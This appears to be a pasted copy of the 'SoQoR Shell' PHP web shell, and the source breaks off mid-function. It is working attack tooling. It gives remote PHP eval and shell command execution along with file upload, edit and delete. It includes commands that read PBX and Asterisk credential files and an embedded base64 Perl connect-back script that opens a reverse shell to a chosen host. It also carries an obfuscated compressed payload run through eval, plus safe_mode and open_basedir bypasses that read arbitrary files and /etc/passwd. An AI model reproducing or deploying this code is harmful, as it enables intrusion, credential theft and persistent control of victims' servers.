· 5 years ago · Feb 05, 2020, 09:48 PM
1
2<?php if(!checklogin($_SERVER["PHP_AUTH_USER"],$_SERVER["PHP_AUTH_PW"])) { #header("WWW-Authenticate: Basic realm=\"Authenication Required\"");
3 #header("HTTP/1.0 401 Unauthorized");
4 #exit("Access Denied .. Reported to your isp provider .. !");
5 }
6 function checklogin($USER,$PW) { $pwd = '33f7dcc134ba3cb84755fafc9496d2fa';
7 if(isset($_COOKIE['logged']) && ($_COOKIE['logged']==1)&&($_COOKIE['user'] == $USER)&& (md5(sha1(md5(base64_encode($_COOKIE['pass']))))==$pwd) ) { return 1;
8 } else { if($pwd==md5(sha1(md5(base64_encode($PW))))) { setcookie('logged','1',time()+3600);
9 setcookie('pass',$PW,time()+3600);
10 setcookie('user',$USER,time()+3600);
11 return 1;
12 } else { return 0;
13 } } } if(version_compare(phpversion(), '4.1.0') == -1) { $_POST = &$HTTP_POST_VARS;
14 $_GET = &$HTTP_GET_VARS;
15 $_SERVER = &$HTTP_SERVER_VARS;
16 } error_reporting(7);
17 set_magic_quotes_runtime(0);
18 @set_time_limit(0);
19 @ini_get("safe_mode");
20 @ini_get("open_basedir");
21 @ini_restore("safe_mode");
22 @ini_restore("open_basedir");
23 @ini_get("safe_mode");
24 @ini_get("open_basedir");
25 @ini_set('max_execution_time',0);
26 @ini_set('output_buffering',0);
27 @ini_set('safe_mode','Off');
28 $link=$_SERVER['PHP_SELF'].'?';
29 $linkdata=(strlen($_SERVER['REQUEST_URI'])>3)?$_SERVER['REQUEST_URI']:$_SERVER['REQUEST_URI'];
30 $GETS = explode('?',$linkdata);
31 $GET = $GETS['1'];
32 $vars = explode("&",base64_decode($GET));
33 foreach($vars as $key => $val) { $GG = explode('=',$val);
34 $_INPUT[$GG[0]]=$GG[1];
35 } $sm = @ini_get('safe_mode');
36 $safemode = ($sm)?'On (Secured)':'Off';
37 $_INPUT=array_merge($_INPUT,$_POST);
38 if(!eregi('WIN',$_SERVER['SERVER_SOFTWARE'])) { $windows=false;
39 $directorysperator='/';
40 } else { $directorysperator='\\';
41 $windows=true;
42 } if($_INPUT['CODE'] == 'file' && $_INPUT['do']=='down') { $exp = explode($directorysperator,$_INPUT['path']);
43 $num=count($exp)-1;
44 $name=$exp[$num];
45 header('Content-Disposition: attachment;
46 filename='.$name.'');
47 header('Content-length: '.filesize($_INPUT['path']).'');
48 header('Content-type: unknown/unknown');
49 if(!(readfile($_INPUT['path']))) { echo file_get_contents($_INPUT['path']);
50 } die();
51 } $head = 'PGh0bWw+CjxoZWFkPgo8bWV0YSBuYW1lPSJHRU5FUkFUT1IiIGNvbnRlbnQ9IlNvUW9SLk5lVCBUZWFtIj4KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PXRleHQvaHRtbDsgY2hhcnNldD13aW5kb3dzLTEyNTY+CjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtTGFuZ3VhZ2UiIGNvbnRlbnQ9YXItc2E+Cjx0aXRsZT5fX1RJVExFX18gLSBTb1FvUi5OZVQgU2hlbGw8L3RpdGxlPgo8L2hlYWQ+CjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+CmJvZHkKewogICAgICAgICBiYWNrZ3JvdW5kOiNFQkU5RUQ7CiAgICAgICAgIGNvbG9yOiM1RTVCNUI7CiAgICAgICAgIGZvbnQtc2l6ZToxMnB4OwogICAgICAgICBmb250LWZhbWlseTpWZXJkYW5hOwp9CmEKewogICAgICAgICBjb2xvcjojNGQ2ZDkxOwp9CmE6bGluawp7CiAgICAgICAgIGNvbG9yOiM0ZDZkOTE7CiAgICAgICAgIHRleHQtZGVjb3JhdGlvbjpub25lOwp9CmE6dmlzaXRlZAp7CiAgICAgICAgIGNvbG9yOiM0ZDZkOTE7CiAgICAgICAgIHRleHQtZGVjb3JhdGlvbjpub25lOwp9CmE6aG92ZXIKewogICAgICAgICBjb2xvcjojN0I3Nzc3OwogICAgICAgICB0ZXh0LWRlY29yYXRpb246dW5kZXJsaW5lOwp9CiNjb250ZW50cGFnZQp7CiAgICAgICAgIGJhY2tncm91bmQ6I0Y0RjRGNDsKICAgICAgICAgY29sb3I6IzZFNkU2RTsKICAgICAgICB3aWR0aDogOTUlOwogICAgICAgIGJvcmRlcjogMXB4IHNvbGlkICM2RTZFNkU7CiAgICAgICAgbWFyZ2luOiBhdXRvIGF1dG87CiAgICAgICAgcGFkZGluZzogMjBweDsKICAgICAgICAgICAgICAgICBmb250LXNpemU6MTJweDsKICAgICAgICAgICAgICAgICBmb250LXdlaWdodDpib2xkOwp9CmlucHV0LCB0ZXh0YXJlYSwgc2VsZWN0CnsKYm9yZGVyLXRvcC13aWR0aCA6IDFweDsKYm9yZGVyLXJpZ2h0LXdpZHRoIDogMXB4Owpib3JkZXItYm90dG9tLXdpZHRoIDogMXB4Owpib3JkZXItbGVmdC13aWR0aCA6IDFweDsKfQppbnB1dCB7IHRleHQtaW5kZW50IDogMnB4OyB9PC9zdHlsZT4KPGJvZHkgd2lkdGg9IjEwMCUiIGFsaWduPWNlbnRlcj4KCjx0YWJsZSBpZD0iY29udGVudHBhZ2UiIGFsaWduPSJjZW50ZXIiPjx0cj48dGQ+';
52 $backconnect = 'IyEvdXNyL2Jpbi9wZXJsCnVzZSBJTzo6U29ja2V0Owokc3lzdGVtICAgID0gJy9iaW4vc2gnOwokQVJHQz1AQVJHVjsKcHJpbnQgIkNvbm5lY3QgQmFjayBCYWNrZG9vciBGcm9tIFNvUW9SIFNoZWxsXG5IdHRwOi8vd3d3LnNvcW9yLm5ldFxuXG4iOwppZiAoJEFSR0MhPTIpIHsKICBwcmludCAiVXNhZ2U6ICQwIFtIb3N0XSBbUG9ydF0gXG5cbiI7CiAgZGllICJFeDogJDAgMTI3LjAuMC4xIDIxMjEgXG4iOwp9CnVzZSBTb2NrZXQ7CnVzZSBGaWxlSGFuZGxlOwpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKSBvciBkaWUgcHJpbnQgIlstXSBVbmFibGUgdG8gUmVzb2x2ZSBIb3N0XG4iOwpjb25uZWN0KFNPQ0tFVCwgc29ja2FkZHJfaW4oJEFSR1ZbMV0sIGluZXRfYXRvbigkQVJHVlswXSkpKSBvciBkaWUgcHJpbnQgIlstXSBVbmFibGUgdG8gQ29ubmVjdCBIb3N0XG4iOwpwcmludCAiWypdIENvbm5lY3RpbmcuLi4gdG8gJEFSR1ZbMF0gcG9ydCAkQVJHVlsxXVxuIjsKcHJpbnQgIlsqXSBDb25uZWN0ZWQgdG8gcmVtb3RlIGhvc3QgXG4iOwpTT0NLRVQtPmF1dG9mbHVzaCgpOwpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsKb3BlbihTVERPVVQsIj4mU09DS0VUIik7Cm9wZW4oU1RERVJSLCI+JlNPQ0tFVCIpOwpwcmludCAiQ29ubmVjdCBCYWNrIEJhY2tkb29yIEZyb20gU29Rb1IgU2hlbGxcbkh0dHA6Ly93d3cuc29xb3IubmV0XG5cbiI7CnN5c3RlbSgidW5zZXQgSElTVEZJTEU7IHVuc2V0IFNBVkVISVNUO2VjaG8gVW5hbWU7IHVuYW1lIC1hO2VjaG87CmVjaG8gSUQ7IGlkO2VjaG87ZWNobyBQV0Q7IHB3ZCIpOwpzeXN0ZW0oJHN5c3RlbSk7Cg==';
53 $aliases=array( 'create sub admin file ?'=>'cp -r /var/www/html/admin/ ./adhm', 'read conf data DB-amportal '=>'cat /etc/amportal.conf | grep DB -i', 'read conf data DB-freepbx '=>'cat /etc/freepbx.conf | grep DB -i', 'read conf data DB-elastix '=>'cat /etc/elastix.conf | grep DB -i', 'read conf Password-manager'=>'cat /etc/asterisk/manager.conf', 'sip-vicidial'=>'cat /etc/asterisk/sip-vicidial.conf ', 'iax-vicidial'=>'cat /etc/asterisk/iax-vicidial.conf ', 'extensions-vicidial'=>'cat /etc/asterisk/extensions-vicidial.conf ', 'sip'=>'cat /etc/asterisk/sip.conf ', 'iax'=>'cat /etc/asterisk/iax.conf ', 'additional_a2billing_sip'=>'cat /etc/asterisk/additional_a2billing_sip.conf ', 'additional_a2billing_iax'=>'cat /etc/asterisk/additional_a2billing_iax.conf ', 'sip_additional'=>'cat /etc/asterisk/sip_additional.conf ', 'iax_additional'=>'cat /etc/asterisk/iax_additional.conf ', 'sip_registrations'=>'cat /etc/asterisk/sip_registrations.conf ', '----------------------------------------------------------------------------------------------------'=>'ls -la' );
54 $commandsselects="";
55 foreach($aliases as $key => $val) { $commandsselects.="<option value='$val'>$key</option>";
56 } $head=base64_decode($head);
57 Echo str_replace('__TITLE__',getenv('HTTP_HOST'),$head);
58 Echo 'uname -a : ';
59 if(!$windows) { if (!command('uname -a')) { echo @php_uname();
60 } else { echo command('uname -a');
61 } } else { Echo @php_uname();
62 } if(($_POST['dirname']) && $_INPUT['CODE'] == 'dir' & $_INPUT['CODE'] == 'godir') { chdir($_POST['dirname']);
63 } elseif(($_POST['dirname']) && $_INPUT['CODE'] == 'dir' & $_INPUT['CODE'] == 'crdir') { mkdir($_POST['dirname']);
64 chmod($_POST['dirname'],0777);
65 chdir($_POST['dirname']);
66 } else { if($_INPUT['CODE'] != 'file') { if($_INPUT['path']) { chdir($_INPUT['path']);
67 } } else { chdir(dirname($_INPUT['path']));
68 } } if(!$dir) { $dir=GETCWD();
69 } if(is_writable("./")) { $dir_rw = getcwd();
70 } else { $dir_rw = "/tmp";
71 } $md5=md5(random(5).md5(time()).random(5));
72 $md5=md5(md5(random(5).md5(time()).random(5)).$md5).'&';
73 Echo '<br>Safe Mode : ';
74 $scolor=($safemode == 'Off')?'Green':'Red';
75 Echo '<font color="'.$scolor.'">'.$safemode.'</font>
76 <br>PHP Version : '.@phpversion().'<br>Software :'.substr($_SERVER['SERVER_SOFTWARE'],0,120).'<br>';
77 echo 'Disable functions : <b>';
78 if(''==($df=@ini_get('disable_functions'))){echo "\n<font color=green>NONE</font></b>";
79}else{echo "<font color=red>$df</font></b>";
80} $space = @disk_total_space(GETCWD());
81 $free = @disk_free_space(GETCWD());
82 echo "\n<br>Free : ".size($free).' Of '.size($space).' ('.ceil(($free/$space)*100).'%)';
83 Echo "\n<br> ID :";
84 if (function_exists(posix_getgid)&&function_exists(posix_getuid)) { $idgettid=' uid=('.posix_getuid().') gid=('.posix_getgid().')';
85 } else { $idgettid=' Unknown/Nobody';
86 } $id = (command('id'))? command('id') :$idgettid;
87 Echo "$id\n<br>\n".' Directory fast change : ';
88 $d = str_replace("\\",$directorysperator,$dir);
89 if (substr($d,-1) != $directorysperator) {$d .= $directorysperator;
90} $d = str_replace("\\\\","\\",$d);
91 $dispd = htmlspecialchars($d);
92 $pd = $e = explode($directorysperator,substr($d,0,-1));
93 $i = 0;
94 foreach($pd as $b) { $t = '';
95 $j = 0;
96 foreach ($e as $r) { $t.= $r.$directorysperator;
97 if ($j == $i) {break;
98} $j++;
99 } $href=$md5.'CODE=dir&path='.$t;
100 $href=base64_encode($href);
101 echo '<a href="'.$link."$href\"><b>".htmlspecialchars($b).$directorysperator.'</b></a>';
102 $i++;
103 } if($windows !== false) { Echo '<br> Go To Another Partition On Windows System : ';
104 $dirs=array('c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r');
105 foreach($dirs as $key => $val) { $file=$val.'://';
106 if(@file_exists($file) && @is_readable($file)) { $href=$link.base64_encode($md5.'CODE=dir&path='.$file);
107 Echo '<a href="'.$href.'">['.$val.']</a>
108
109';
110 } } } $array=array('phpcode','cmd','pbx','backconnect','mysql','phpinfo');
111 foreach($array as $key => $val) { $links[]=$link.base64_encode($md5."CODE=$val&path=".$dir);
112 } Echo '</td><td align="center">SoQoR Shell <font color="red">V1.0</font><br>' ."\n".' <a href="http://www.soqor.net"><img src="http://greenrobot.com/greenrobotimages/pirateIcon.png" border="0"><br>WwW.SoQoR.NeT</a></td>' ."\n".' </tr><tr>'."\n".' <td colspan="2"><hr>' ."\n".' <center><a href="'.$link.'">[ Home ]</a> - <a href="'.$links[0].'">[ PHP CODE ]</a> - <a href="'.$links[1].'">[ Command Execution ]</a> - <a href="'.$links[2].'">[ PBX Functions ]</a> - <a href="'.$links[3].'">[ BackConnection ]</a> - <a href="'.$links[4].'">[ Mysql ]</a> - <a href="'.$links[5].'">[ PHPinfo ]</a> - <a href="http://www.soqor.net">[ Exit ]</a></center>' ."\n".' </td></tr></table>' ."\n".' <br><table align=center style="background:#F4F4F4;
113color:#6E6E6E;
114width: 95%;
115border: 1px solid #6E6E6E;
116margin: auto auto;
117font-size:12px;
118font-weight:bold;
119"><tr><td><center><b>Owned by HACKERS PAL <
120'."\n".'<a href="mailto:security@soqor.net">SecuRitY@SoQoR.NeT</a>>
121</b></center></td></tr></table>'."\n".' <br><table id="contentpage" align=center><tr><td colspan="7">';
122 if($_INPUT['CODE'] == 'phpinfo') { Echo "</td></tr></table><dev align=left>";
123 phpinfo();
124 } if($_INPUT['CODE'] == 'dir' || !$_INPUT['CODE']) { if($_INPUT['do']=='up') { if(function_exists('copy')) { @copy($_FILES['file']['tmp_name'],$_INPUT['path'].$directorysperator.$_FILES['file']['name']);
125 } else { @move_uploaded_file($_FILES['file']['tmp_name'],$_INPUT['path'].$directorysperator.$_FILES['file']['name']);
126 } if(file_exists($_INPUT['path'].$directorysperator.$_FILES['file']['name'])) { Echo '<font color="green">Successfully Uploaded to '.$_INPUT['path'].$directorysperator.$_FILES['file']['name'];
127 } else { Echo '<font color="red">Unable To Upload File';
128 } Echo '</font>';
129 } $files = array();
130 $dirs = array();
131 $odir=opendir($dir);
132 while($file = readdir($odir)) { if(is_dir($dir.'/'.$file)) { $dirs[]=$file;
133 } else { $files[]=$file;
134 } } sort($dirs);
135 sort($files);
136 Echo '<font size="1"><center> Listing folder ['.$dir.'] || ('.count($dirs).' Dirs And '.count($files).' Files)</center></font><hr></td></tr>';
137 Echo '<tr><td width="30%">Name</td>
138 <td>Size</td>
139 <td>Read</td>
140 <td>Modify</td>
141 <td>Owner/Group</td>
142 <td>Permissions</td>
143 <td>Actions</td></tr>';
144 foreach($dirs as $key => $val) { $dirvalues=array('name'=>$val, 'size'=>'dir', 'modify' => (is_writable($dir.$directorysperator.$val)?'Yes':'No'), 'read' => (is_readable($dir.$directorysperator.$val)?'Yes':'No'), 'owner' => owner($dir.$directorysperator.$val), 'permissions' => getperms($dir.$directorysperator.$val));
145 Echo printfile($dirvalues);
146 } $files=($files);
147 foreach($files as $key => $val) { $fvalues=array('name'=> $val, 'size'=> size(@filesize($dir.$directorysperator.$val)), 'modify' => (is_writable($dir.$directorysperator.$val)?'Yes':'No'), 'read' => (is_readable($dir.$directorysperator.$val)?'Yes':'No'), 'owner' => owner($dir.$directorysperator.$val), 'permissions' => getperms($dir.$directorysperator.$val));
148 Echo printfile($fvalues);
149 } } elseif($_INPUT['CODE'] == 'perms') { echo "Changing Permission for : ".$_INPUT['path'];
150 if(empty($_POST['newper'])) { $perms=shownumperms(@fileperms($_INPUT['path']));
151 Echo "\n<br>Current Permission is : 0".$perms;
152 $perhref=$md5.'CODE=perms&'.'path='.$_INPUT['path'];
153 $newlink=$link.base64_encode($perhref);
154 Echo '<center>Enter New Permissions <form action="'.$newlink.'" method="post">
155 <input type="text" name="newper" value="0'.$perms.'"><br>
156 <input type=submit value="Change Permissions"></form></center>';
157 } else { @chmod($_INPUT['path'],$_POST['newper']);
158 Echo "<br><br>Permission changed to : ".$_POST['newper'];
159;
160 } } elseif($_INPUT['CODE'] == 'file') { if($_INPUT['do'] =='edit' || $_INPUT['do'] =='save') { if($_INPUT['do'] != 'edit') { $contents=$_POST['text'];
161 if(get_magic_quotes_gpc()) { $contents = stripslashes($contents);
162 } $fp=fopen($_INPUT['path'],w9);
163 fwrite($fp,$contents);
164 fclose($fp);
165 $newtext='<h2><font color=green>Saved !</font></h2>';
166 } Echo '<font size="1">'.$newtext.'<center> Editing File = '.$_INPUT['path'].'</center></font><hr></td></tr>';
167 $href=$md5."CODE=file&do=save&path=".$_INPUT['path'];
168 $action=$link.base64_encode($href);
169 Echo '<tr><td colspan="6"><form action="'.$action.'" method=post><textarea name="text" rows=15 cols=70>';
170 echo htmlspecialchars(file_get_contents($_INPUT['path']));
171 Echo '</textarea><br><br>';
172 if(is_writable($_INPUT['path'])) { Echo '<input type=submit value=" - - save - - ">';
173 } else { Echo '<font color="red">This File is Read Only and no permission to edit</font>';
174 } } elseif($_INPUT['do']=='create') { if(get_magic_quotes_gpc()) { $_POST['file']= stripslashes($_POST['file']);
175 } Echo '<font size="1"><center> Creating File = '.$_POST['file'].'</center></font><hr></td></tr>';
176 $href=$md5."CODE=file&do=save&path=".$_POST['file'];
177 $action=$link.base64_encode($href);
178 Echo '<tr><td colspan="6"><form action="'.$action.'" method=post><textarea name="text" rows=15 cols=70>';
179 echo 'Owned By HACKERS PAL (Edit here)';
180 Echo '</textarea><br><br>';
181 if(is_writable($_INPUT['path'])) { Echo '<input type=submit value=" - - save - - ">';
182 } else { Echo '<font color="red">This Folder is Read Only and no permission to Create a file</font>';
183 } } elseif($_INPUT['do']=="del") { if($_INPUT['d'] == 'del') { $href=$md5."CODE=dir&path=".dirname($_INPUT['path']);
184 $action=$link.base64_encode($href);
185 unlink($_INPUT['path']);
186 die('<meta http-equiv="Refresh" content="0;
187 URL='.$action.'">');
188 } if(get_magic_quotes_gpc()) { $_POST['file']= stripslashes($_POST['file']);
189 } Echo '<font size="1"><center> Deleting File = '.$_INPUT['path'].'</center></font><hr></td></tr>';
190 $href=$md5."CODE=file&do=del&d=del&path=".$_INPUT['path'];
191 $action=$link.base64_encode($href);
192 Echo '<tr><td colspan="6"><form action="'.$action.'" method=post><center>Are You Sure You Want to delete this file ??<br><br>';
193 if(is_writable($_INPUT['path'])) { Echo '<input type=submit value=" - - Delete File - - ">';
194 } else { Echo '<font color="red">This File is Read Only and no permission to Delete</font>';
195 } } else { Echo '<font size="1"><center> Viewing File = '.$_INPUT['path'].'</center></font><hr></td></tr>';
196 Echo '<tr><td colspan="6">';
197 if(!(show_source($_INPUT['path']))) { echo htmlspecialchars(file_get_contents($_INPUT['path']));
198 } Echo '<br><br>';
199 } } elseif($_INPUT['CODE'] == 'phpcode') { Echo '<font size="1"><center> Executing PHP CODE</center></font><hr></td></tr>';
200 Echo '<tr><td colspan="6"><center>';
201 if(isset($_POST['phpcode'])) { if(get_magic_quotes_gpc()) { $_POST['phpcode'] = stripslashes($_POST['phpcode']);
202 } Echo 'Result Of Evaling The Code<br><textarea name="evaledphpcode" cols="90" rows="10">';
203 eval($_POST['phpcode']);
204 Echo '</textarea>';
205 } $action=$links[0];
206 Echo '<form name="phpcode" action="'.$action.'" method="post"><br><textarea name="phpcode" cols="90" rows="10">'.htmlspecialchars($_POST['phpcode']).'</textarea><br><br><input type=submit value="Execute Code"></form>';
207 Echo '</center><br><br>';
208 } elseif($_INPUT['CODE'] == 'cmd') { Echo '<font size="1"><center> Executing Commands To The Server</center></font><hr></td></tr>' .'<tr><td colspan="6"><center>';
209 if(isset($_POST['cdm'])) { if(get_magic_quotes_gpc()) { $_POST['cdm'] = stripslashes($_POST['cdm']);
210 } Echo 'Result Of Executing Command<br><textarea name="executed" cols="90" rows="10">';
211 Echo command($_POST['cdm']);
212 Echo '</textarea>';
213 } $action=$links[1];
214 Echo '<form name="command" action="'.$action.'" method="post"><br><textarea name="cdm" cols="90" rows="10">'.htmlspecialchars($_POST['cdm']).'</textarea><br><br><input type=submit value="Execute Command"></form>';
215 Echo '</center><br><br>';
216 } elseif($_INPUT['CODE'] == 'pbx') { Echo '<font size="1"><center> PBX Functions</center></font><hr></td></tr>' .'<tr><td colspan="6"><center>';
217 $vall = "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";
218 if(isset($_POST['cdm'])) { if(get_magic_quotes_gpc()) { $_POST['cdm'] = stripslashes($_POST['cdm']);
219 } Echo 'Result Of Executing Command<br>';
220 if($_POST['cdm']==1) { echo "<pre>";
221 eval(gzuncompress(base64_decode($vall)));
222 echo "</pre>";
223 } else { command("ln -s ../admin atmin");
224 echo "<a href='atmin'>Admin Here</a>";
225 } } $action=$links[2];
226 Echo '<form name="command" action="'.$action.'" method="post"><input type="hidden" name="cdm" value="1"><input type=submit value="Change Password"></form>';
227 Echo '<form name="command" action="'.$action.'" method="post"><input type="hidden" name="cdm" value="2"><input type=submit value="Create Atmin"></form>';
228 Echo '</center><br><br>';
229 } elseif($_INPUT['CODE'] == 'backconnect') { Echo '<font size="1"><center> ConnectBack Backdoor</center></font><hr></td></tr>
230 <tr><td colspan="6"><center>';
231 if($_POST['backdoored'] == 1) { if(is_writable($dir)) { $d=$dir;
232 } else { if(!$windows) { $d='/tmp';
233 } else { $d='c:\\windows\temp';
234 } } $fp = fopen($d.'/sq.pl','w9');
235 fwrite($fp,base64_decode($backconnect));
236 fclose($fp);
237 if(!$windows) { $perl='perl';
238 } else { $perl="c:\\perl\bin\perl.exe";
239 } $command = $perl.' '.$d.$directorysperator.'sq.pl '.$_POST['i'].' '.$_POST['p'];
240 Echo 'Runing Connect-Back backdoor ..<br>';
241 Echo nl2br(htmlspecialchars(command($command)));
242 Echo "<br>";
243 } $action=$links[3];
244 Echo "<form name=\"backcon\" action=\"$action\" method=\"post\">\n<input type=\"hidden\" name=\"backdoored\" value=\"1\">\n<input type=\"text\" name=\"i\" value=\"".getip()."\"> : <input type=\"text\" name=\"p\" value=\"22290\"><br><br><input type=submit value=\"Connect-Back\"></form>";
245 Echo "</center>";
246 } elseif($_INPUT['CODE']=='bypass') { if($_INPUT['do']=='bypass_file') { $filename = stripslashes($_POST['filename']);
247 Echo "Reading File : ".$filename." By ".$_POST['bug']."<br><br>\n\n";
248 if($_POST['bug']=='Tempname') { $temp=tempnam($dir_rw, "cx");
249 if(copy("compress.zlib://".$filename, $temp)){ $zrodlo = fopen($temp, "r");
250 $tekst = fread($zrodlo, @filesize($temp));
251 fclose($zrodlo);
252 echo "<B>--- Start File ".htmlspecialchars($filename)."
253 -------------</B><br>\n".nl2br(htmlspecialchars($tekst))."\n<B>--- End File
254 ".htmlspecialchars($filename)." ---------------\n";
255 unlink($temp);
256 } else { die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
257 <B>".htmlspecialchars($filename)."</B> dosen't exists or you don't have
258 access.</CENTER></FONT>");
259 } } elseif($_POST['bug']=='CURL') { echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
260 $m=$_POST['curl'];
261 $ch = @curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
262 @curl_exec($ch);
263 @var_dump(curl_exec($ch));
264 echo "</textarea>";
265 } elseif($_POST['bug']=='Copy') { @copy($filename,$dir_rw.$directorysperator.md5(time()).".sq");
266 echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
267 $fp = fopen($dir_rw.$directorysperator.md5(time()).".sq", "r");
268 $contents = fread($fp, @filesize($dir_rw.$directorysperator.md5(time()).".sq"));
269 fclose($fp);
270 Echo htmlspecialchars($contents);
271 echo "</textarea>";
272 @unlink($dir_rw.$directorysperator.md5(time()).".sq");
273 } elseif($_POST['bug']=='Ini_Restore') { echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
274 echo ini_get("safe_mode");
275 echo ini_get("open_basedir");
276 ini_restore("safe_mode");
277 ini_restore("open_basedir");
278 echo ini_get("safe_mode");
279 echo ini_get("open_basedir");
280 readfile("$filename");
281 echo "</textarea>";
282 } elseif($_POST['bug']=='IMAP') { echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
283 $stream = @imap_open($filename, "", "");
284 $str = @imap_body($stream, 1);
285 echo "<pre>".htmlspecialchars($str)."</pre>";
286 @imap_close($stream);
287 echo "</textarea>";
288 } elseif($_POST['bug']=='ReadFile') { echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
289 @readfile($filename);
290 echo "</textarea>";
291 } elseif($_POST['bug']=='File_Get_Contents') { echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
292 Echo htmlspecialchars(file_get_contents(($filename)));
293 echo "</textarea>";
294 } elseif($_POST['bug']=='Shell_Command') { echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
295 Echo htmlspecialchars(command("cat $filename"));
296 echo "</textarea>";
297 } elseif($_POST['bug']=='Id Only /etc/passwd') { echo "read file id" ,"<br>";
298 echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
299 for($uid=0;
300$uid<60000;
301$uid++) { $ara = posix_getpwuid($uid);
302 if (!empty($ara)) { while (list ($key, $val) = each($ara)) { print "$val:";
303 } print "\n";
304 } } echo "</textarea>";
305 break;
306 } else { Echo "No Bug Selected .. !!";
